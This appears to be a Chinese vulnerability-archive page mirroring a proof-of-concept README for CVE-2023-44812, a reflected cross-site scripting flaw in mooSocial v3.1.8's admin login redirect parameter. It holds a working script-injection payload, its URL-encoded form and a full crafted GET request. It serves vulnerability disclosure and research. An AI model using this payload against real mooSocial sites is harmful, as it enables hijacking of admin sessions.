关联漏洞
标题:
mooSocial 跨站脚本漏洞
(CVE-2023-44812)
描述:mooSocial是mooSocial公司的一个多平台、移动就绪、用户友好的脚本。用于构建社区驱动的内容共享和社交网络网站。 mooSocial v.3.1.8版本存在安全漏洞。攻击者利用该漏洞通过特制的有效载荷对user login函数的admin_redirect_url参数执行任意代码。
描述
mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.
介绍
# CVE-2023-44812
A reflected cross-site scripting (XSS) vulnerability in the **admin_redirect_url** parameter on user login function of mooSocial v3.1.8 which allows attackers to steal admin's session cookies and impersonate their account via a crafted URL.
Vulerable Parameter: **admin_redirect_url**
## Exploit - Proof of Concept (POC)
### Reflect cross-site scripting (XSS)
```
Payload : "><script>alert(1)</script>
FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
```
GET Request on [/moosocial/admin/home/login?admin_redirect_url=] :
```
GET /moosocial/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: CAKEPHP=nidqufo1vqbqircuufs0mh98m4; 19edc47bb57545288d88183ca75c9a0bmooSocial[theme]=Q2FrZQ%3D%3D.7AxYtZYvgA%3D%3D
Upgrade-Insecure-Requests: 1
Referer: http://745f1976-76bd-42e5-9ece-01e2ad60316d.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="117", "Chromium";v="117"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
### Screenshot

文件快照
[4.0K] /data/pocs/52278d5d70bfa2bf9df52fb20e7b623b98067fc7
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。